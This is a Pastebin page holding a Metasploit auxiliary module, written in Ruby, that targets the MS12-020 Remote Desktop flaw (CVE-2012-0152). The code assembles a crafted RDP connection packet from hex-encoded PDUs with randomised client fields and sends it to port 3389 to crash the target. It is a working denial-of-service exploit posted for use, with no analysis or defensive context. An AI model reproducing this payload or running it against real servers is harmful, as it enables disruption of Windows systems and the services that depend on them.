API tools faq
paste
Advertisement
Guest User

ms12-020 metasploit dos module

a guest
Mar 18th, 2012
1,854
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
raw download clone embed print report
  1. class Metasploit3 < Msf::Auxiliary
  2.  
  3. include Msf::Exploit::Remote::Tcp
  4. include Msf::Auxiliary::Dos
  5.  
  6. def initialize(info = {})
  7. super(update_info(info,
  8. 'Name' => 'ms12-020',
  9. 'Description' => %q{
  10. MS12-020
  11. },
  12. 'Author' => [ 'a.maloteaux' ],
  13. 'License' => MSF_LICENSE,
  14. 'Version' => '$Revision: 14976 $',
  15. 'References' =>
  16. [
  17. [ 'CVE', '2012-0152' ],
  18. [ 'MSB', 'MS12-020'],
  19. [ 'OSVDB', '80004' ],
  20. [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
  21. ],
  22. 'DisclosureDate' => 'Mar 03 2012'))
  23.  
  24. register_options(
  25. [
  26. Opt::RPORT(3389)
  27. ], self.class )
  28. end
  29.  
  30. def run
  31. client_name = ::Rex::Text::to_unicode(::Rex::Text::rand_text_alphanumeric(15 - rand(10)).ljust(16,"\x00"), 'utf-16le')
  32. client_product_id = "#{::Rex::Text::rand_text_numeric(5)}-#{::Rex::Text::rand_text_numeric(3)}-#{::Rex::Text::rand_text_numeric(7)}-#{::Rex::Text::rand_text_numeric(5)}"
  33. client_product_id = ::Rex::Text::to_unicode(client_product_id.ljust(32,"\x00"))
  34.  
  35. payload = "030000130EE000000000000100080000000000".to_a.pack("H*")
  36. #MCS Connect Initial PDU with GCC Conference Create Request
  37. payload << "030001a002f0807f6582019404010104".to_a.pack("H*")
  38. payload << "01010101ff3019".to_a.pack("H*")
  39. payload << "020100".to_a.pack("H*") #ChannelIds = 0
  40. payload << "020102020100".to_a.pack("H*")
  41. payload << "0201010201000201010202ffff020102".to_a.pack("H*")
  42. payload << "30190201010201010201010201010201".to_a.pack("H*")
  43. payload << "0002010102020420020102301c0202ff".to_a.pack("H*")
  44. payload << "ff0202fc170202ffff02010102010002".to_a.pack("H*")
  45. payload << "01010202ffff02010204820133000500".to_a.pack("H*")
  46. payload << "147c0001812a000800100001c0004475".to_a.pack("H*")
  47. payload << "6361811c01c0d8000400080000050004".to_a.pack("H*")
  48. payload << "01ca03aa09040000ce0e0000".to_a.pack("H*")
  49. payload << client_name
  50. payload << "04000000".to_a.pack("H*")
  51. payload << "000000000c0000000000000000000000".to_a.pack("H*")
  52. payload << "00000000000000000000000000000000".to_a.pack("H*")
  53. payload << "00000000000000000000000000000000".to_a.pack("H*")
  54. payload << "00000000000000000000000000000000".to_a.pack("H*")
  55. payload << "000000000000000001ca010000000000".to_a.pack("H*")
  56. payload << "180007000100".to_a.pack("H*")
  57. payload << client_product_id
  58. payload << "00000000000004c00c00".to_a.pack("H*")
  59. payload << "0d0000000000000002c00c001b000000".to_a.pack("H*")
  60. payload << "0000000003c02c000300000072647064".to_a.pack("H*")
  61. payload << "7200000000008080636c697072647200".to_a.pack("H*")
  62. payload << "0000a0c0726470736e640000000000c0".to_a.pack("H*")
  63. #User Request PDU
  64. payload << "0300000802f08028".to_a.pack("H*")
  65.  
  66. begin
  67. connect
  68. sock.put(payload)
  69. Kernel.select(nil, nil, nil, 2)
  70. rescue
  71. print_error("Server not available")
  72. end
  73. end
  74. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!